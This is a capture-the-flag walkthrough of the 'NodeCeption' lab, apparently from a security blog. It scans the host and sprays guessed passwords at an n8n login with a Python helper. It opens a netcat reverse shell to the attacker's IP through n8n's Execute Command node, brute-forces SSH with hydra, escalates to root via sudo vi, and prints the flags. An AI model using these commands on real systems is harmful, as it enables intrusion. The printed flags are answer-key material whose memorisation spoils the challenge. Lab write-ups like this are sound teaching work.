NodeCeption

Target Description

I. Information Gathering

1. Host Discovery

┌──(root㉿kali)-[~]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:06 CST
Nmap scan report for 192.168.2.1
Host is up (0.0011s latency).
MAC Address: 0A:00:27:00:00:0A (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.0011s latency).
MAC Address: 08:00:27:F5:5B:8F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.70
Host is up (0.0031s latency).
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

Target IP: 192.168.2.70 (192.168.2.4 is the attacking Kali box, 192.168.2.1/.2 are the VirtualBox gateway and DHCP server)

2. Port Scanning

1) Full TCP port scan

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -p- 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:06 CST
Nmap scan report for 192.168.2.70
Host is up (0.00090s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5678/tcp open rrac
8765/tcp open ultraseek-http
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.37 seconds

Open ports: 22, 5678, 8765

2) Service, version and OS detection

┌──(root㉿kali)-[~]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,5678,8765 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:07 CST
Nmap scan report for 192.168.2.70
Host is up (0.00081s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 67:df:2b:e6:48:16:ec:91:b1:a6:67:25:37:05:fc:0f (ECDSA)
|_ 256 dc:ab:74:b7:be:b5:49:6a:c8:7b:db:6b:7c:91:73:69 (ED25519)
5678/tcp open rrac?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Accept-Ranges: bytes
| Cache-Control: public, max-age=86400
| Last-Modified: Thu, 21 Aug 2025 14:19:26 GMT
| ETag: W/"7b7-198ccffb4db"
| Content-Type: text/html; charset=utf-8
| Content-Length: 1975
| Vary: Accept-Encoding
| Date: Thu, 21 Aug 2025 15:07:44 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <script type="module" crossorigin src="/assets/polyfills-B8p9DdqU.js"></script>
| <meta charset="utf-8" />
| <meta http-equiv="X-UA-Compatible" content="IE=edge" />
| <meta name="viewport" content="width=device-width,initial-scale=1.0" />
| <link rel="icon" href="/favicon.ico" />
| <style>@media (prefers-color-scheme: dark) { body { background-color: rgb(45, 46, 46) } }</style>
| <script type="text/javascript">
| window.BASE_PATH = '/';
| window.REST_ENDPOINT = 'rest';
| </script>
| <script src="/rest/sentry.js"></script>
| <script>!function(t,e){var o,n,
| HTTPOptions:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Vary: Accept-Encoding
| Date: Thu, 21 Aug 2025 15:07:44 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
| </html>
| RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Vary: Accept-Encoding
| Date: Thu, 21 Aug 2025 15:07:45 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
|_ </html>
8765/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.58 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port5678-TCP:V=7.94SVN%I=7%D=8/21%Time=68A73641%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,8DC,"HTTP/1\.1\x20200\x20OK\r\nAccept-Ranges:\x20bytes\r\nC
SF:ache-Control:\x20public,\x20max-age=86400\r\nLast-Modified:\x20Thu,\x20
SF:21\x20Aug\x202025\x2014:19:26\x20GMT\r\nETag:\x20W/\"7b7-198ccffb4db\"\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x201
SF:975\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x
SF:2015:07:44\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<h
SF:tml\x20lang=\"en\">\n\t<head>\n\t\t<script\x20type=\"module\"\x20crosso
SF:rigin\x20src=\"/assets/polyfills-B8p9DdqU\.js\"></script>\n\n\t\t<meta\
SF:x20charset=\"utf-8\"\x20/>\n\t\t<meta\x20http-equiv=\"X-UA-Compatible\"
SF:\x20content=\"IE=edge\"\x20/>\n\t\t<meta\x20name=\"viewport\"\x20conten
SF:t=\"width=device-width,initial-scale=1\.0\"\x20/>\n\t\t<link\x20rel=\"i
SF:con\"\x20href=\"/favicon\.ico\"\x20/>\n\t\t<style>@media\x20\(prefers-c
SF:olor-scheme:\x20dark\)\x20{\x20body\x20{\x20background-color:\x20rgb\(4
SF:5,\x2046,\x2046\)\x20}\x20}</style>\n\t\t<script\x20type=\"text/javascr
SF:ipt\">\n\t\t\twindow\.BASE_PATH\x20=\x20'/';\n\t\t\twindow\.REST_ENDPOI
SF:NT\x20=\x20'rest';\n\t\t</script>\n\t\t<script\x20src=\"/rest/sentry\.j
SF:s\"></script>\n\t\t<script>!function\(t,e\){var\x20o,n,")%r(HTTPOptions
SF:,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20d
SF:efault-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-T
SF:ype:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nVary:\
SF:x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x2015:07:44\x2
SF:0GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\
SF:"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</he
SF:ad>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(
SF:RTSPRequest,183,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-P
SF:olicy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r
SF:\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x2014
SF:3\r\nVary:\x20Accept-Encoding\r\nDate:\x20Thu,\x2021\x20Aug\x202025\x20
SF:15:07:45\x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<htm
SF:l\x20lang=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</t
SF:itle>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\x20/</pre>\n</body>\n</h
SF:tml>\n");
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.61 seconds
  1. 22/tcp: SSH, OpenSSH 9.6p1 on Ubuntu (the 3ubuntu13.x suffix is the Ubuntu 24.04 package line).
  2. 5678/tcp: nmap prints "rrac" only because that is the IANA name for the port number; the fingerprint is plainly HTTP. The GET response is an HTML page that sets window.REST_ENDPOINT = 'rest' and loads /rest/sentry.js, and the "Cannot OPTIONS /" 404 page with Content-Security-Policy: default-src 'none' is the stock Node.js/Express error page. So this is a Node-based web application, not a remote replication agent; it is identified as n8n below.
  3. 8765/tcp: HTTP, Apache httpd 2.4.58 (Ubuntu), serving the default "It works" page.

3) UDP scan

┌──(root㉿kali)-[~]
└─# nmap -sU --top-ports 100 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:52 CST
Nmap scan report for 192.168.2.70
Host is up (0.00093s latency).
All 100 scanned ports on 192.168.2.70 are in ignored states.
Not shown: 58 closed udp ports (port-unreach), 42 open|filtered udp ports (no-response)
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 55.60 seconds

No confirmed open UDP ports. The 42 open|filtered ports simply did not answer, which is the normal result for a host without UDP services and not worth chasing further here.

4) NSE vuln script scan

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p22,5678,8765 192.168.2.70
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-21 23:54 CST
Nmap scan report for 192.168.2.70
Host is up (0.00097s latency).

PORT STATE SERVICE
22/tcp open ssh
5678/tcp open rrac
8765/tcp open ultraseek-http
MAC Address: 08:00:27:32:DB:77 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 10.75 seconds

Nothing new: the vuln scripts produced no output. Note that this scan was run without -sV, so the script rules saw the services as "rrac" and "ultraseek-http" rather than http, and the HTTP vuln scripts most likely never ran against these ports. A silent vuln scan is not evidence that the services are clean.

II. Exploitation

1. Web on port 5678

Browsing to port 5678 shows an n8n instance. From earlier labs, n8n can run OS commands on its host from inside a workflow, which is a direct route to a reverse shell, but the editor requires a login first.

Parked for now until credentials turn up.

2. Web on port 8765

Port 8765 serves the Apache default page.

The page source contains a hint in an HTML comment:

<!-- usuario@maildelctf.com
Espero que hayas cambiado la contraseña como se te indicó.
Recuerda: mínimo 8 caracteres, al menos 1 número y 1 mayúscula.
-->

Translated from Spanish:

usuario@maildelctf.com
I hope you changed the password as you were told.
Remember: at least 8 characters, at least 1 number and 1 uppercase letter.

So the username is usuario@maildelctf.com and the password policy is at least 8 characters with at least one digit and one uppercase letter. A published password policy is as useful to the attacker as to the user: it lets us discard most of a wordlist before spending a single login attempt.

3. n8n

1) Password guessing

Using the hint, filter the first 5000 lines of rockyou for passwords that satisfy the policy (the lookaheads enforce "has a digit" and "has an uppercase letter", the .{8,} enforces the length):

┌──(root㉿kali)-[/tmp]
└─# head -n 5000 /usr/share/wordlists/rockyou.txt | grep -P '^(?=.*\d)(?=.*[A-Z]).{8,}$'
Password1
PASSWORD1

Logging in as usuario@maildelctf.com with Password1 gets into the n8n editor.
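The same pruning, carried a step further into a small spraying helper. This is an added example, not code from the original writeup. The policy regex is the one from the hint; the login endpoint (/rest/login), the JSON field names and the "HTTP 200 means success" rule are assumptions about n8n that you should confirm by watching the browser's login request in the developer tools before trusting the script. The sample wordlist is constructed and stands in for `head -n 5000 rockyou.txt`.

```python
"""Prune a wordlist with a leaked password policy, then spray the survivors.

Added example, not from the original writeup. Endpoint path and body field
names are ASSUMPTIONS about n8n's login API; confirm them in the browser's
developer tools (Network tab) before relying on this.
"""
import json
import re
import time
import urllib.error
import urllib.request

# Policy from the HTML comment on port 8765: >= 8 chars, >= 1 digit, >= 1 uppercase.
POLICY = re.compile(r"^(?=.*\d)(?=.*[A-Z]).{8,}$")


def matches_policy(password: str) -> bool:
    """True if the candidate could have been accepted under the stated policy."""
    return POLICY.match(password) is not None


def prune(wordlist_lines, limit=None):
    """Keep only candidates that satisfy the policy, preserving wordlist order.

    Duplicates are dropped so the login endpoint is never hit twice with the
    same guess; `limit` mirrors `head -n N` on the wordlist.
    """
    seen = set()
    out = []
    for i, line in enumerate(wordlist_lines):
        if limit is not None and i >= limit:
            break
        pw = line.rstrip("\r\n")
        if pw in seen or not matches_policy(pw):
            continue
        seen.add(pw)
        out.append(pw)
    return out


def try_login(base_url, user, password, login_field="emailOrLdapLoginId", timeout=5):
    """One login attempt; True only on HTTP 200.

    ASSUMPTION: POST {base_url}/rest/login with a JSON body. Recent n8n builds
    name the user field emailOrLdapLoginId, older ones used email; pass
    login_field="email" if the devtools capture shows that.
    """
    body = json.dumps({login_field: user, "password": password}).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + "/rest/login",
        data=body,
        headers={"Content-Type": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False  # 400/401: wrong credentials or a body the server rejected


def spray(base_url, user, candidates, delay=0.5):
    """Try candidates in order; return the first accepted password or None."""
    for pw in candidates:
        if try_login(base_url, user, pw):
            return pw
        time.sleep(delay)  # lockouts and log noise are the usual way this fails
    return None


# Constructed sample standing in for `head -n 5000 /usr/share/wordlists/rockyou.txt`.
SAMPLE_WORDLIST = [
    "123456", "password", "Password1", "iloveyou", "PASSWORD1",
    "basketball", "Abc12345", "Password1", "qwerty", "Summer2020",
]

if __name__ == "__main__":
    import sys
    cands = prune(SAMPLE_WORDLIST)
    print("candidates:", cands)
    # python3 spray.py http://192.168.2.70:5678 usuario@maildelctf.com
    if len(sys.argv) == 3:
        print("found:", spray(sys.argv[1], sys.argv[2], cands))
```

Against the real rockyou head the pruning is what makes the attack cheap: the policy throws away almost every line, so the handful of survivors can be tried by hand or with a slow, quiet spray rather than a noisy brute force.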

2) Reverse shell

  1. Workflows can run OS commands on the n8n host (n8n ships an Execute Command node for exactly this).

  2. Test with a harmless command first to confirm execution works; it does.

  3. Reverse shell. The listener below is on port 4444, so the port has to be in the command:
    busybox nc 192.168.2.4 4444 -e /bin/bash

  4. The shell comes back:

    ┌──(root㉿kali)-[/tmp]
    └─# nc -lvnp 4444
    listening on [any] 4444 ...
    connect to [192.168.2.4] from (UNKNOWN) [192.168.2.70] 39622
    id
    uid=1000(thl) gid=1000(thl) groups=1000(thl),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)
  5. Upgrade to a fully interactive TTY:

    /usr/bin/script -qc /bin/bash /dev/null
    # press Ctrl+Z to suspend the shell
    stty raw -echo; fg
    # press Enter
    reset xterm
    export TERM=xterm
    export SHELL=/bin/bash
    stty rows 24 columns 80
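```

Start the listener before executing the imported workflow; Execute Command blocks until the shell exits, so the workflow run simply stays "running" while the reverse shell is alive.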

III. Privilege Escalation

Check the user's id: thl is in the sudo group and the lxd group (lxd group membership is itself a well-known escalation path via a privileged container; it is not needed here).

thl@nodeception:~$ id
uid=1000(thl) gid=1000(thl) groups=1000(thl),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),101(lxd)

Check sudo -l:

thl@nodeception:~$ sudo -l
Matching Defaults entries for thl on nodeception:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty

User thl may run the following commands on nodeception:
(ALL) NOPASSWD: /usr/bin/vi
(ALL : ALL) ALL

The first entry allows vi as root without a password, so try the obvious route:

thl@nodeception:~$ sudo vi
[sudo] password for thl:

It prompts for a password anyway. The reason is in the sudo -l output itself: when several sudoers entries match, sudo applies the last matching one, not the most specific one. Both entries match /usr/bin/vi, and the later (ALL : ALL) ALL line (almost certainly Ubuntu's default %sudo rule, since thl is in the sudo group) wins over the earlier NOPASSWD line. The NOPASSWD entry would only take effect if it came after the group rule in sudoers. Either way, thl's password is needed.
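To make the ordering rule concrete, here is a deliberately simplified model of sudo's entry matching, written for this writeup and not taken from sudo's source. It models only what matters here (user-level entries, exact command match or ALL, the NOPASSWD tag) and ignores hosts, runas restrictions, Defaults, wildcards and digests. The two entries are the ones sudo -l printed on nodeception, in that order.

```python
"""Why `sudo vi` prompted despite NOPASSWD: a simplified sudoers matcher.

Added example for this writeup, not sudo's code. It keeps only the parts of
sudoers matching that matter here (command match or ALL, NOPASSWD tag) and
ignores hosts, runas, Defaults, wildcards and digests.
"""
from dataclasses import dataclass


@dataclass
class Entry:
    """One line as printed by `sudo -l`, e.g. (ALL) NOPASSWD: /usr/bin/vi."""
    commands: tuple          # ("ALL",) or absolute paths
    nopasswd: bool = False

    def matches(self, command: str) -> bool:
        return "ALL" in self.commands or command in self.commands


def resolve(entries, command):
    """sudo semantics: every matching entry is considered and the LAST one wins.

    Returns (allowed, password_required). The NOPASSWD tag is read from the
    winning entry only, which is why an early NOPASSWD line is overridden by a
    later catch-all such as a group rule.
    """
    winner = None
    for e in entries:
        if e.matches(command):
            winner = e
    if winner is None:
        return False, True
    return True, not winner.nopasswd


# Entries in the order `sudo -l` printed them on nodeception.
AS_ON_TARGET = [
    Entry(commands=("/usr/bin/vi",), nopasswd=True),  # (ALL) NOPASSWD: /usr/bin/vi
    Entry(commands=("ALL",)),                         # (ALL : ALL) ALL, most likely the %sudo rule
]

if __name__ == "__main__":
    print("as on target:       ", resolve(AS_ON_TARGET, "/usr/bin/vi"))        # (True, True)
    print("NOPASSWD line last: ", resolve(AS_ON_TARGET[::-1], "/usr/bin/vi"))  # (True, False)
```

The practical lesson cuts both ways: an administrator who adds a NOPASSWD line above the %sudo rule has not actually granted password-less access, and an attacker reading sudo -l should check entry order before assuming a NOPASSWD tag is live.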

Try to brute-force thl's password over SSH with hydra (the SSH service on port 22 accepts password authentication, and thl is a local user):

┌──(root㉿kali)-[~]
└─# hydra -l thl -P /usr/share/wordlists/rockyou.txt -t 8 192.168.2.70 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-26 22:12:37
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 8 tasks per 1 server, overall 8 tasks, 14344399 login tries (l:1/p:14344399), ~1793050 tries per task
[DATA] attacking ssh://192.168.2.70:22/
[22][ssh] host: 192.168.2.70 login: thl password: basketball
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-26 22:13:20

Password recovered: basketball

Escalate. Inside vi, type :!/bin/bash to spawn a shell; since vi runs as root, so does the shell (the transcript shows the command as entered after the colon):

thl@nodeception:/tmp$ sudo vi
[sudo] password for thl:
!/bin/bash
root@nodeception:/tmp# id
uid=0(root) gid=0(root) groups=0(root)

Or, since the second sudoers entry grants ALL, simply:

thl@nodeception:/tmp$ sudo -i
[sudo] password for thl:
root@nodeception:~# id
uid=0(root) gid=0(root) groups=0(root)

IV. Flags

root@nodeception:~# cat /home/thl/user.txt /root/root.txt 
THL_wdYkVpXlqNaEUhRJfzbtHm
THL_QzXeoMuYRcJtWHabnLKfgDi

NodeCeption
http://miao-sec.github.io/Thehackerslabs/NodeCeption/
Author: Miao
Published: August 26, 2025
License: BY-MIAO